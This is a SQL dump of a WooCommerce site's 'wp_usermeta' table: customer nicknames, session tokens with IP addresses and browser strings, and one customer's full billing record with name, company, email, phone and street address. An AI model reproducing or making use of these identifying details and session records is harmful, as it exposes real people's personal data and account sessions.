INSERT INTO `wp_usermeta` VALUES (9538, 581, 'session_tokens', 'a:1:{s:64:"e8c44b8870edd197f2c3ddcfa222a1673d5429ba145e508376633cb36dbed609";a:4:{s:10:"expiration";i:1491504879;s:2:"ip";s:14:"174.79.165.186";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36";s:5:"login";i:1490295279;}}'); 
INSERT INTO `wp_usermeta` VALUES (9539, 582, 'nickname', 'daniel.mccormick'); 
INSERT INTO `wp_usermeta` VALUES (9540, 582, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9541, 582, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9542, 582, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9543, 582, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9544, 582, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9545, 582, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9546, 582, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9547, 582, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9548, 582, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9549, 582, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9550, 582, '_yoast_wpseo_profile_updated', '1490300536'); 
INSERT INTO `wp_usermeta` VALUES (9551, 582, 'session_tokens', 'a:1:{s:64:"c0b7102645d8b6c892462c69982309bcbbcca919dcf4c4cbbbb83b8f057201bf";a:4:{s:10:"expiration";i:1491510145;s:2:"ip";s:14:"173.251.75.178";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490300545;}}'); 
INSERT INTO `wp_usermeta` VALUES (9552, 582, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9553, 583, 'nickname', 'e.levine'); 
INSERT INTO `wp_usermeta` VALUES (9554, 583, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9555, 583, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9556, 583, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9557, 583, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9558, 583, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9559, 583, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9560, 583, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9561, 583, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9562, 583, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9563, 583, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9564, 583, '_yoast_wpseo_profile_updated', '1490376970'); 
INSERT INTO `wp_usermeta` VALUES (9565, 583, 'session_tokens', 'a:1:{s:64:"432f816708ddd9b7b197291532b100df08cb226e01d0d498a3c9e389233cbf89";a:4:{s:10:"expiration";i:1491586580;s:2:"ip";s:12:"96.39.11.146";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490376980;}}'); 
INSERT INTO `wp_usermeta` VALUES (9566, 584, 'nickname', 'mnichols'); 
INSERT INTO `wp_usermeta` VALUES (9567, 584, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9568, 584, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9569, 584, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9570, 584, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9571, 584, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9572, 584, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9573, 584, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9574, 584, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9575, 584, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9576, 584, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9577, 584, '_yoast_wpseo_profile_updated', '1490380594'); 
INSERT INTO `wp_usermeta` VALUES (9578, 584, 'session_tokens', 'a:1:{s:64:"3c8057afa9d558fcac913627eeda645fd2ecd57fcb3ce487f19d8477148b82ff";a:4:{s:10:"expiration";i:1491590210;s:2:"ip";s:14:"38.109.141.132";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490380610;}}'); 
INSERT INTO `wp_usermeta` VALUES (9579, 585, 'nickname', 'yzhao'); 
INSERT INTO `wp_usermeta` VALUES (9580, 585, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9581, 585, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9582, 585, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9583, 585, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9584, 585, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9585, 585, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9586, 585, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9587, 585, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9588, 585, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9589, 585, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9590, 585, '_yoast_wpseo_profile_updated', '1490444847'); 
INSERT INTO `wp_usermeta` VALUES (9591, 585, 'session_tokens', 'a:1:{s:64:"1b7a6534acc1855ebb07d0a345fcb71439fa6a69825555b35eb00a2572a0b8ad";a:4:{s:10:"expiration";i:1491654460;s:2:"ip";s:13:"45.72.195.195";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1490444860;}}'); 
INSERT INTO `wp_usermeta` VALUES (9592, 586, 'nickname', 'jc.cornello'); 
INSERT INTO `wp_usermeta` VALUES (9593, 586, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9594, 586, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9595, 586, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9596, 586, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9597, 586, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9598, 586, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9599, 586, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9600, 586, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9601, 586, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9602, 586, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9603, 586, '_yoast_wpseo_profile_updated', '1490607683'); 
INSERT INTO `wp_usermeta` VALUES (9604, 586, 'session_tokens', 'a:1:{s:64:"ed55b522717152e20abf8b89991d1b31e0341cdbbf6a415325ceaf1d8842773b";a:4:{s:10:"expiration";i:1491817293;s:2:"ip";s:14:"195.235.54.185";s:2:"ua";s:65:"Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1490607693;}}'); 
INSERT INTO `wp_usermeta` VALUES (9606, 587, 'nickname', 'pat'); 
INSERT INTO `wp_usermeta` VALUES (9607, 587, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9608, 587, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9609, 587, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9610, 587, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9611, 587, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9612, 587, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9613, 587, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9614, 587, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9615, 587, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9616, 587, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9617, 587, '_yoast_wpseo_profile_updated', '1490634577'); 
INSERT INTO `wp_usermeta` VALUES (9618, 587, 'session_tokens', 'a:1:{s:64:"0b75ea4d82581a905ca5359d22c283f7e65998af24e387e366d18f72af0ab3a6";a:4:{s:10:"expiration";i:1491844189;s:2:"ip";s:14:"104.243.115.35";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490634589;}}'); 
INSERT INTO `wp_usermeta` VALUES (9619, 587, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9620, 588, 'nickname', 'pphhaamm'); 
INSERT INTO `wp_usermeta` VALUES (9621, 588, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9622, 588, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9623, 588, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9624, 588, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9625, 588, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9626, 588, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9627, 588, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9628, 588, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9629, 588, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9630, 588, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9631, 588, '_yoast_wpseo_profile_updated', '1490639352'); 
INSERT INTO `wp_usermeta` VALUES (9632, 588, 'session_tokens', 'a:1:{s:64:"4cf30adf98b47423035fed4e39713a17da86bb13dda388664bde8023ca845fb3";a:4:{s:10:"expiration";i:1491848961;s:2:"ip";s:12:"66.162.21.86";s:2:"ua";s:71:"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)";s:5:"login";i:1490639361;}}'); 
INSERT INTO `wp_usermeta` VALUES (9633, 589, 'nickname', 'timbroussard'); 
INSERT INTO `wp_usermeta` VALUES (9634, 589, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9635, 589, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9636, 589, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9637, 589, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9638, 589, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9639, 589, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9640, 589, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9641, 589, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9642, 589, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9643, 589, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9644, 589, '_yoast_wpseo_profile_updated', '1490644968'); 
INSERT INTO `wp_usermeta` VALUES (9645, 589, 'session_tokens', 'a:1:{s:64:"fbf20b659ce7d9c33c5a79dc8fc60cc7649b398108cf48062b6dd293ce106964";a:4:{s:10:"expiration";i:1491854575;s:2:"ip";s:12:"12.31.217.66";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490644975;}}'); 
INSERT INTO `wp_usermeta` VALUES (9646, 590, 'nickname', 'jjarrett'); 
INSERT INTO `wp_usermeta` VALUES (9647, 590, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9648, 590, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9649, 590, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9650, 590, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9651, 590, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9652, 590, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9653, 590, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9654, 590, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9655, 590, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9656, 590, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9657, 590, '_yoast_wpseo_profile_updated', '1490650012'); 
INSERT INTO `wp_usermeta` VALUES (9658, 590, 'session_tokens', 'a:1:{s:64:"fda4d9bc7a335601848d7c600248a36f069ac9877eab34ceee086ad9439759f2";a:4:{s:10:"expiration";i:1491859622;s:2:"ip";s:15:"192.107.156.196";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490650022;}}'); 
INSERT INTO `wp_usermeta` VALUES (9659, 591, 'nickname', 'walshey_eww'); 
INSERT INTO `wp_usermeta` VALUES (9660, 591, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9661, 591, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9662, 591, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9663, 591, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9664, 591, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9665, 591, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9666, 591, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9667, 591, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9668, 591, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9669, 591, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9670, 591, '_yoast_wpseo_profile_updated', '1490651359'); 
INSERT INTO `wp_usermeta` VALUES (9671, 591, 'session_tokens', 'a:1:{s:64:"df7393c19d8bcc5ffa7f7980f50f32e28e77bbacaa48ae92c9760dcde973e713";a:4:{s:10:"expiration";i:1491860967;s:2:"ip";s:12:"138.163.0.42";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490651367;}}'); 
INSERT INTO `wp_usermeta` VALUES (9672, 592, 'nickname', 'barry.roach.ctr'); 
INSERT INTO `wp_usermeta` VALUES (9673, 592, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9674, 592, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9675, 592, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9676, 592, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9677, 592, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9678, 592, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9679, 592, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9680, 592, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9681, 592, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9682, 592, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9683, 592, '_yoast_wpseo_profile_updated', '1490675146'); 
INSERT INTO `wp_usermeta` VALUES (9684, 592, 'session_tokens', 'a:1:{s:64:"dbdfecfad7042d246e6fac60c9e8681b7bd4bd7a6865983684052cc3f2475f1c";a:4:{s:10:"expiration";i:1491884755;s:2:"ip";s:14:"131.78.167.229";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1490675155;}}'); 
INSERT INTO `wp_usermeta` VALUES (9685, 592, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9686, 593, 'nickname', 'VBantody'); 
INSERT INTO `wp_usermeta` VALUES (9687, 593, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9688, 593, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9689, 593, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9690, 593, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9691, 593, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9692, 593, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9693, 593, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9694, 593, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9695, 593, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9696, 593, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9697, 593, '_yoast_wpseo_profile_updated', '1490676199'); 
INSERT INTO `wp_usermeta` VALUES (9699, 593, 'session_tokens', 'a:1:{s:64:"7285b8e68a0e149771a5077644d45a44f135579392311412f84fd228a7042750";a:4:{s:10:"expiration";i:1490849060;s:2:"ip";s:12:"219.65.67.26";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490676260;}}'); 
INSERT INTO `wp_usermeta` VALUES (9700, 594, 'nickname', 'dlight'); 
INSERT INTO `wp_usermeta` VALUES (9701, 594, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9702, 594, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9703, 594, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9704, 594, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9705, 594, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9706, 594, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9707, 594, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9708, 594, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9709, 594, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9710, 594, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9711, 594, '_yoast_wpseo_profile_updated', '1490686757'); 
INSERT INTO `wp_usermeta` VALUES (9712, 594, 'session_tokens', 'a:1:{s:64:"16e57aff7328981b10cb864e934132cf90ca626c81614027fed640f579c9b3a3";a:4:{s:10:"expiration";i:1491896368;s:2:"ip";s:14:"206.18.165.129";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490686768;}}'); 
INSERT INTO `wp_usermeta` VALUES (9713, 593, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9714, 595, 'nickname', 'ibailey'); 
INSERT INTO `wp_usermeta` VALUES (9715, 595, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9716, 595, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9717, 595, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9718, 595, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9719, 595, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9720, 595, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9721, 595, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9722, 595, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9723, 595, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9724, 595, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9725, 595, '_yoast_wpseo_profile_updated', '1490715508'); 
INSERT INTO `wp_usermeta` VALUES (9726, 595, 'session_tokens', 'a:1:{s:64:"79224b852858c8b3f23844aa83f361167b6c26a63127b613bbd7bc59de695104";a:4:{s:10:"expiration";i:1491925116;s:2:"ip";s:14:"206.121.91.166";s:2:"ua";s:128:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393";s:5:"login";i:1490715516;}}'); 
INSERT INTO `wp_usermeta` VALUES (9727, 596, 'nickname', 'bradmard'); 
INSERT INTO `wp_usermeta` VALUES (9728, 596, 'first_name', 'Bijan'); 
INSERT INTO `wp_usermeta` VALUES (9729, 596, 'last_name', 'Radmard'); 
INSERT INTO `wp_usermeta` VALUES (9730, 596, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9731, 596, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9732, 596, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9733, 596, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9734, 596, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9735, 596, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9736, 596, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9737, 596, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9738, 596, '_yoast_wpseo_profile_updated', '1490716467'); 
INSERT INTO `wp_usermeta` VALUES (9739, 596, 'session_tokens', 'a:2:{s:64:"4988d18ddbeebfcf3cdc51000efac8282ff4afd2a344134e696b32456b9e68c5";a:4:{s:10:"expiration";i:1491926075;s:2:"ip";s:12:"50.241.79.56";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490716475;}s:64:"ea37bbc086b661659cfb4cc889258825c7a4e0c4088b973c372eb581e73d8698";a:4:{s:10:"expiration";i:1491926184;s:2:"ip";s:12:"50.241.79.56";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36";s:5:"login";i:1490716584;}}'); 
INSERT INTO `wp_usermeta` VALUES (9740, 596, 'billing_first_name', 'Bijan'); 
INSERT INTO `wp_usermeta` VALUES (9741, 596, 'billing_last_name', 'Radmard'); 
INSERT INTO `wp_usermeta` VALUES (9742, 596, 'billing_company', 'Chase Corporation'); 
INSERT INTO `wp_usermeta` VALUES (9743, 596, 'billing_email', 'bradmard@chasecorp.com'); 
INSERT INTO `wp_usermeta` VALUES (9744, 596, 'billing_phone', '7813320735'); 
INSERT INTO `wp_usermeta` VALUES (9745, 596, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (9746, 596, 'billing_address_1', '295 University Ave.'); 
INSERT INTO `wp_usermeta` VALUES (9747, 596, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (9748, 596, 'billing_city', 'Westwood'); 
INSERT INTO `wp_usermeta` VALUES (9749, 596, 'billing_state', 'MA'); 
INSERT INTO `wp_usermeta` VALUES (9750, 596, 'billing_postcode', '02090'); 
INSERT INTO `wp_usermeta` VALUES (9751, 596, 'last_update', '1490716579'); 
INSERT INTO `wp_usermeta` VALUES (9752, 597, 'nickname', 'kanderson'); 
INSERT INTO `wp_usermeta` VALUES (9753, 597, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9754, 597, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9755, 597, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9756, 597, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9757, 597, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9758, 597, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9759, 597, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9760, 597, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9761, 597, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9762, 597, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9763, 597, '_yoast_wpseo_profile_updated', '1490721049'); 
INSERT INTO `wp_usermeta` VALUES (9764, 597, 'session_tokens', 'a:1:{s:64:"f34700492e3667a35459bbe2887fa30cd6ae9e46dd2782da6daf8b8dbbc8e8f1";a:4:{s:10:"expiration";i:1491930657;s:2:"ip";s:14:"206.112.187.36";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1490721057;}}'); 
INSERT INTO `wp_usermeta` VALUES (9765, 598, 'nickname', 'lfrye'); 
INSERT INTO `wp_usermeta` VALUES (9766, 598, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9767, 598, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9768, 598, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9769, 598, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9770, 598, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9771, 598, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9772, 598, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9773, 598, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9774, 598, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9775, 598, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9776, 598, '_yoast_wpseo_profile_updated', '1490735018'); 
INSERT INTO `wp_usermeta` VALUES (9777, 598, 'session_tokens', 'a:1:{s:64:"3ee841cc9d15806437fd349f3d05a9e9bdcde6c5df181ae460b13065f9060dae";a:4:{s:10:"expiration";i:1496317835;s:2:"ip";s:14:"199.255.170.94";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1496145035;}}'); 
INSERT INTO `wp_usermeta` VALUES (9778, 598, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (9779, 599, 'nickname', 'ahmad.salmin_eng'); 
INSERT INTO `wp_usermeta` VALUES (9780, 599, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9781, 599, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (9782, 599, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (9783, 599, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9784, 599, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (9785, 599, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (9786, 599, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (9787, 599, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (9788, 599, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (9789, 599, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (9790, 599, '_yoast_wpseo_profile_updated', '1490772889'); 
INSERT INTO `wp_usermeta` VALUES (9791, 599, 'session_tokens', 'a:1:{s:64:"f7c935e9856675b2aca1528364e6ee845cd166ac937dc6131681c00c8760c384";a:4:{s:10:"expiration";i:1491982499;s:2:"ip";s:13:"183.91.73.114";s:2:"ua";s:65:"Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0";s:5:"login";i:1490772899;}}'); 
INSERT INTO `wp_usermeta` VALUES (9792, 599, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
